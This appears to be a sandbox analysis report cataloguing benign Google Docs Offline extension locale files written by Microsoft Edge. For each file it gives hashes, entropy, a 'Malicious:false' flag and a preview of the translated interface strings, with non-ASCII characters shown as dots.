                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                  SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):972
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                  MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                  SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                  SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                  SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):990
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                  MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                  SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                  SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                  SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1658
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                  MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                  SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                  SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                  SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\scoped_dir6596_799178386\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
